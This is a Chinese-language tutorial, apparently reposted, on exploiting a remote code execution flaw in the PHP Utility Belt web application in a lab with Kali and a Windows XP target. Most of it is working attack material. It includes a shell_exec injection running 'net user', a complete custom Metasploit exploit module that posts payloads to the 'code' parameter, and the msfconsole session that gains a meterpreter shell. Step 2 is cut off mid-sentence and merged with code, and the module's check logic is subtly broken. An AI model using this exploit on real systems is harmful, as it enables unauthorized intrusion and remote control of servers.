渗透之——Metasploit渗透php-utility-belt程序（metasploit渗透linux系统）

渗透之——Metasploit渗透php-utility-belt程序（metasploit渗透linux系统）

​

攻击机 kali 192.168.109.137

靶机：Win XP 192.168.109.141

应用程序 php-utility-belt (可以到链接下载)

1.部署php-utility-belt

由于php-utility-belt是php程序，所以我们需要安装php环境,这里我为了简单直接安装了wamp环境。

将php-utility-belt解压后放在wamp的$a = "net user"; echo shell_exec($a);?>');

3.查看php-utility-belt下的文件

此时，我们发现php-utility-belt下多了一个info.php文件

我们查看这个文件的内容：

4.访问info.php

我们在浏览器中输入：访问info.php。

这里，会显示靶机上的所有用户，说明php-utility-belt存在漏洞。

5.进一步分析php-utility-belt的漏洞

在google或firefox浏览器按下F12键，通过对网页代码的分析，文本框中的数据是通过参数code进行post提交的。

6.编写攻击脚本php_utility_belt_attack_by_binghe.rb

### Author 冰河# Date 2019-01-17# Description Metasploit渗透 php utility belt##require 'msf/core'class Metasploit4 < Msf::Exploit::Remote include Msf:: Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PHP Utility Belt Remote Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in P }, 'Author' => [ 'binghe' ], 'DisclosureDate' => '2019-01-17', 'Platform' => 'php', 'Payload' => { 'Space' => 2000, # 现在的漏洞在一个Web应用程序中，而不是在软件程序中，所以要将DisableNops的值设置为true以关闭攻击载荷中的NOP 'DisableNops' => true }, 'Targets' => [ ['PHP Utility Belt', {}] ], 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php']), OptString.new('CHECKURI', [false, 'Checking Perpose', '/php-utility-belt/info.php']), ], self.class) end def check send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { 'code' => "fwrite(fopen('info.php','w'), '');" } ) resp = send_request_raw({'uri' => normalize_uri(datastore['CHECKURI']), 'method' => 'GET'}) if resp.body = ~/phpinfo()/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end def exploit send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_post' => { 'code' => payload.encoded } ) end end

7.上传攻击脚本php_utility_belt_attack_by_binghe.rb

将攻击脚本php_utility_belt_attack_by_binghe.rb上传的Kali的/usr/share/metasploit-framework/modules/exploits/web/php目录下。

8.运行攻击脚本php_utility_belt_attack_by_binghe.rb

msfconsoleuse exploit/web/php/php_utility_belt_attack_by_binghe set payload php/meterpreter/bind_tcpset RHOST 192.168.109.141show optionsexploitsysinfo

具体操作效果如下：

msf > use exploit/web/php/php_utility_belt_attack_by_binghe msf exploit(web/php/php_utility_belt_attack_by_binghe) > set payload php/meterpreter/bind_tcppayload => php/meterpreter/bind_tcpmsf exploit(web/php/php_utility_belt_attack_by_binghe) > set RHOST 192.168.109.141RHOST => 192.168.109.141msf exploit(web/php/php_utility_belt_attack_by_binghe) > show optionsModule options (exploit/web/php/php_utility_belt_attack_by_binghe): Name Current Setting Required Description ---- --------------- -------- ----------- CHECKURI /php-utility-belt/info.php no Checking Perpose Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST 192.168.109.141 yes The target address RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /php-utility-belt/ajax.php yes The path to PHP Utility Belt VHOST no HTTP server virtual hostPayload options (php/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LPORT 4444 yes The listen port RHOST 192.168.109.141 no The target addressExploit target: Id Name -- ---- 0 PHP Utility Beltmsf exploit(web/php/php_utility_belt_attack_by_binghe) > exploit[*] Started bind TCP handler against 192.168.109.141:4444[*] Sending stage (38247 bytes) to 192.168.109.141meterpreter > sysinfoComputer : LIUYAZHUANGOS : Windows NT LIUYAZHUANG 5.1 build 2600 (Windows XP Professional Service Pack 3) i586Meterpreter : php/windowsmeterpreter >

到此，我们已经拿到了靶机的Shell，后续就可以进行各种渗透操作了。

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。